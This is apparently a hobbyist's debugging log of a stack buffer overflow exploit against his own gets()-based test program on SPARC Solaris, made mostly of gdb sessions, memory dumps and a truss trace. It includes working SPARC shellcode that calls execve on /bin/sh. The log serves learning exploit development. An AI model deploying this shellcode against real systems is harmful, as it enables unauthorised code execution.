welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) list 0
1       #include
2       unsigned long get_sp( void ) {
3               __asm__("or %sp,%sp,%r1");
4       }
5
6       void copy( ){
7               char buf[256];
8
9               gets(buf);
10      }
(gdb)
11
12      int main( ) {
13              unsigned long ret = get_sp();
14              fprintf (stderr, "sp = 0x%x\n", ret);
15              copy(  );
16              return 0;
17      }
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) # overflow just happened
(gdb) x/96x $sp
# at this point, this current stack frame's %fp and %i7 are below and are the infected ones
# that will be returned upon the next ret restore.
# at the top of this printout is a continuation from my marker program,
# you can see the pattern. The beginning of the buffer could be looked at by
# going lower in memory ie. x/96x $sp-96 or farther down as well..
# but that's not necessary for us. this post is to show how the write syscalls
# are about to be executed just fine, but later the execv
# syscall just returns and I don't get a shell for some reason.
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x1112195b      0x9012206c      0xd023a054      0x111bc280
0xffbeff10:     0xd023a058      0x9203a054      0x90102001      0x94102007
0xffbeff20:     0x82102004      0x91d02008      0x82102001      0x90102000
0xffbeff30:     0x91d02008      0x00002000      0x000007d0      0x00001caf
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type  to continue, or q  to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) si
17      }
(gdb)
0x00010798      17      }
(gdb) x/4i $pc
0x10798 <main+64>:      ret
0x1079c <main+68>:      restore
0x107a0 <main+72>:      retl
0x107a4 <main+76>:      add  %o7, %l7, %l7
(gdb) si
0x0001079c      17      }
(gdb)
0xffbeff00 in ?? ()
(gdb) x/16i $pc
0xffbeff00:     sethi  %hi(0x48656c00), %o0
0xffbeff04:     or  %o0, 0x6c, %o0      ! 0x48656c6c
0xffbeff08:     st  %o0, [ %sp + 0x54 ]
0xffbeff0c:     sethi  %hi(0x6f0a0000), %o0
0xffbeff10:     st  %o0, [ %sp + 0x58 ]
0xffbeff14:     add  %sp, 0x54, %o1
0xffbeff18:     mov  1, %o0
0xffbeff1c:     mov  7, %o2
0xffbeff20:     mov  4, %g1
0xffbeff24:     ta  8
0xffbeff28:     mov  1, %g1
0xffbeff2c:     clr  %o0
0xffbeff30:     ta  8
0xffbeff34:     unimp  0x2000
0xffbeff38:     unimp  0x7d0
0xffbeff3c:     unimp  0x1caf
(gdb) si
0xffbeff04 in ?? ()
(gdb)
0xffbeff08 in ?? ()
(gdb)
0xffbeff0c in ?? ()
(gdb)
0xffbeff10 in ?? ()
(gdb)
0xffbeff14 in ?? ()
(gdb)
0xffbeff18 in ?? ()
(gdb)
0xffbeff1c in ?? ()
(gdb)
0xffbeff20 in ?? ()
(gdb)
0xffbeff24 in ?? ()
(gdb)
Hello
0xffbeff28 in ?? ()
(gdb)
0xffbeff2c in ?? ()
(gdb)
0xffbeff30 in ?? ()
(gdb)

Program exited normally.
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Hello

Program exited normally.
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
Hello
bazz@blade72[pts/1][~/tools/tmp/latest]

OK I clearly demonstrated how the write example buffer overflow hijacked just fine.

But now.. a shell spawn fails, and I don’t know why:

bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S
.globl main
main:
set 0x2f62696e, %o0
st %o0, [%sp+84]
set 0x2f736800, %o0
st %o0, [%sp+88]
add %sp, 84, %o0
clr [%sp+92]
st %o0, [%sp+76]
clr [%sp+80]
add %sp, 76, %o1
xor %o5,%o5,%o2
mov 0x3b, %g1
ta 8
!ta 8
! addition to prevent illegal instruction failure
xor %o5,%o5,%o0
!add %o1,%o1,%o0
! interprets as end of string!! even without null byte ! and o1, 2, %o0         ! exit(0)
mov     1, %g1
ta      8

bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3
bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin
000000 110bd89a 9012216e d023a054 110bdcda
000010 d023a058 9003a054 c023a05c d023a04c
000020 c023a050 9203a04c 941b400d 8210203b
000030 91d02008 901b400d 82102001 91d02008
000040
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest

bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Breakpoint 1, main () at v.c:16
16              return 0;
(gdb) x/96x $sp
0xffbefe00:     0x03515151      0x03525252      0x03535353      0x03545454
0xffbefe10:     0x03555555      0x03565656      0x03575757      0x03585858
0xffbefe20:     0x03595959      0x035a5a5a      0x04414141      0x04424242
0xffbefe30:     0x04434343      0x04444444      0xffbefd78      0xffbefef8
0xffbefe40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe70:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe80:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefe90:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefea0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefeb0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefec0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefed0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefee0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefef0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbeff00:     0x110bd89a      0x9012216e      0xd023a054      0x110bdcda
0xffbeff10:     0xd023a058      0x9003a054      0xc023a05c      0xd023a04c
0xffbeff20:     0xc023a050      0x9203a04c      0x941b400d      0x8210203b
0xffbeff30:     0x91d02008      0x901b400d      0x82102001      0x91d02008
0xffbeff40:     0x000007d1      0x00001caf      0x000007d2      0x00002801
0xffbeff50:     0x000007d3      0x00002801      0x000007d9      0x00000007
0xffbeff60:     0x00000000      0x00000000      0x2f6e6f62      0x61636b75
---Type <return> to continue, or q <return> to quit---
0xffbeff70:     0x702f626c      0x61646537      0x345f7364      0x30672f62
(gdb) c
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) c
Continuing.

Program exited normally.
# NO SHELL!!!
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! 
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90

Program received signal SIGTRAP, Trace/breakpoint trap.
0xff3b3be0 in ?? ()
(gdb) x/16i $pc
0xff3b3be0:     b,a   0xff3b3bec
0xff3b3be4:     b,a   0xff3b3bf0
0xff3b3be8:     b,a   0xff3b3bf4
0xff3b3bec:     mov  %g0, %o0
0xff3b3bf0:     save  %sp, -160, %sp
0xff3b3bf4:     call  0xff3b3bfc
0xff3b3bf8:     sethi  %hi(0x2c800), %l7
0xff3b3bfc:     or  %l7, 0x3b4, %l7     ! 0x2cbb4
0xff3b3c00:     addcc  %i0, %g0, %o0
0xff3b3c04:     bne  0xff3b3c60
0xff3b3c08:     add  %l7, %o7, %l7
0xff3b3c0c:     add  %sp, 0x60, %o0
0xff3b3c10:     mov  3, %l0
0xff3b3c14:     st  %l0, [ %o0 ]
0xff3b3c18:     add  %fp, 0x44, %l0
0xff3b3c1c:     st  %l0, [ %o0 + 4 ]
(gdb) q
The program is running.  Exit anyway? (y or n) y
bazz@blade72[pts/1][~/tools/tmp/latest]

I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….

TO BE CONTINUED

… UPDATE!!!!

-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ truss $PWD/invoke2 v < payload
execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C)  argc = 3
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libcurses.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23
open("/usr/lib/libcurses.so.1", O_RDONLY)       = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000
mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000
mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000
mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000
munmap(0xFF36A000, 65536)                       = 0
memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libsocket.so.1", 0xFFBEF620)     = 0
resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23
open("/usr/lib/libsocket.so.1", O_RDONLY)       = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000
mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000
mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000
munmap(0xFF32A000, 65536)                       = 0
memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libnsl.so.1", 0xFFBEF620)        = 0
resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20
open("/usr/lib/libnsl.so.1", O_RDONLY)          = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF200000
mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000
mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000
mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000
memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000
mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000
close(3)                                        = 0
stat("/usr/lib/libc.so.1", 0xFFBEF620)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000
mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000
mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000
munmap(0xFF1AC000, 65536)                       = 0
memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libmp.so.2", 0xFFBEF620)         = 0
resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19
open("/usr/lib/libmp.so.2", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000
mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000
mmap(0xFF2F4000, 865, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000
munmap(0xFF2E4000, 65536)                       = 0
memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000
mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000
close(3)                                        = 0
munmap(0xFF390000, 8192)                        = 0
getcontext(0xFFBEFA88)
open64("/dev/tty", O_RDWR|O_NONBLOCK)           = 3
close(3)                                        = 0
brk(0x0010A060)                                 = 0
sysconfig(_CONFIG_PAGESIZE)                     = 8192
brk(0x0010A060)                                 = 0
brk(0x0010C000)                                 = 0
brk(0x0010E000)                                 = 0
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getuid()                                        = 100 [100]
getgid()                                        = 10 [10]
getcontext(0xFFBEFA88)
time()                                          = 1413348374
brk(0x00110000)                                 = 0
brk(0x00112000)                                 = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020)  = 0
sigfillset(0xFF1C28D0)                          = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20)      = 0
uname(0xFFBEF5D8)                               = 1
stat64("/home/bazz/latest", 0xFFBEF928)         = 0
stat64(".", 0xFFBEF890)                         = 0
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpid()                                        = 2098 [2097]
getpgrp()                                       = 2097
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20)       = 0
sysconfig(_CONFIG_CHILD_MAX)                    = 7893
getcontext(0xFFBEFA88)
open64("/home/bazz/latest/invoke2", O_RDONLY)   = 3
ioctl(3, TCGETA, 0xFFBEFAE4)                    Err#25 ENOTTY
llseek(3, 0, SEEK_CUR)                          = 0
read(3, " # ! / b i n / b a s h\n".., 80)       = 80
llseek(3, 0, SEEK_SET)                          = 0
getrlimit(RLIMIT_NOFILE, 0xFFBEFA78)            = 0
fcntl(255, F_GETFD, 0xFFBEFAE4)                 Err#9 EBADF
fcntl(3, F_DUP2FD, 0x000000FF)                  = 255
close(3)                                        = 0
fcntl(255, F_SETFD, 0x00000001)                 = 0
fcntl(255, F_GETFL, 0x00000000)                 = 8192
fstat64(255, 0xFFBEFAD8)                        = 0
fstat64(255, 0xFFBEFB30)                        = 0
llseek(255, 0, SEEK_CUR)                        = 0
getcontext(0xFFBEFA08)
read(255, " # ! / b i n / b a s h\n".., 718)    = 718
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
brk(0x00114000)                                 = 0
getcontext(0xFFBEF390)
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8)  = 0
getcontext(0xFFBEF488)
brk(0x00116000)                                 = 0
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C)  = 0
llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR)       = 305
fork()                                          = 2099
sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF350)
sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650)       = 0
close(4)                                        = 0
read(3, " 0\n", 128)                            = 2
read(3, 0xFFBEF710, 128)                        = 0
close(3)                                        = 0
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670)  = 0
sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8)       = 0
sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " p r o g = $ ( / h o m e".., 718)    = 413
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0)  = 0
getcontext(0xFFBEF2A0)
pipe()                                          = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484)  = 0
llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR)       = 343
fork()                                          = 2100
sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0
    Received signal #18, SIGCLD [caught]
      siginfo: SIGCLD CLD_EXITED pid=2100 status=0x0000
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF168)
sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468)       = 0
close(4)                                        = 0
read(3, " / h o m e / b a z z / l".., 128)      = 20
read(3, 0xFFBEF528, 128)                        = 0
close(3)                                        = 0
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488)  = 0
sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0)       = 0
sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360)       = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " s h i f t\n i f   [   -".., 718)    = 375
getcontext(0xFFBEFA08)
getcontext(0xFFBEF4E0)
getcontext(0xFFBEF4E0)
setcontext(0xFFBEF4E0)
sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660)       = 0
sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660)      = 0
sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660)       = 0
execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908)  argc = 5
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/tools/gcc-3.4.2/lib/libc.so.1", 0xFFBEF638) Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF638)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x10B0A4E0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF638)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x1018CDC8, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF350) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
brk(0x000310C8)                                 = 0
brk(0x000330C8)                                 = 0
getuid()                                        = 100 [100]
getuid()                                        = 100 [100]
execve("/home/bazz/latest/v", 0xFFBEFD64, 0x000314E0)  argc = 1
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
stat("/usr/lib/libc.so.1", 0xFFBEF7F0)          = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY)            = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x127A87A0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF280000
mmap(0xFF280000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF280000
mmap(0xFF33C000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF33C000
munmap(0xFF32C000, 65536)                       = 0
memcntl(0xFF280000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3)                                        = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF7F0)         = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY)           = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x127A4538, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF380000
mmap(0xFF380000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF380000
close(3)                                        = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF508) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF370000
mmap(0xFF370000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF370000
close(3)                                        = 0
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF360000
munmap(0xFF390000, 8192)                        = 0
sp = 0xwrite(2, " s p   =   0 x", 7)                    = 7
ffbefdb8write(2, " f f b e f d b 8", 8)                 = 8

write(2, "\n", 1)                               = 1
ioctl(0, TCGETA, 0xFFBEFB54)                    Err#25 ENOTTY
fstat64(0, 0xFFBEFBC8)                          = 0
brk(0x00020B00)                                 = 0
brk(0x00024B00)                                 = 0
read(0, "01 A A A01 B B B01 C C C".., 8192)     = 421
read(0, 0x00020B0C, 8192)                       = 0
execve("/bin/sh", 0xFFBEFEB0, 0x00000000)  argc = 2
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY)             Err#2 ENOENT
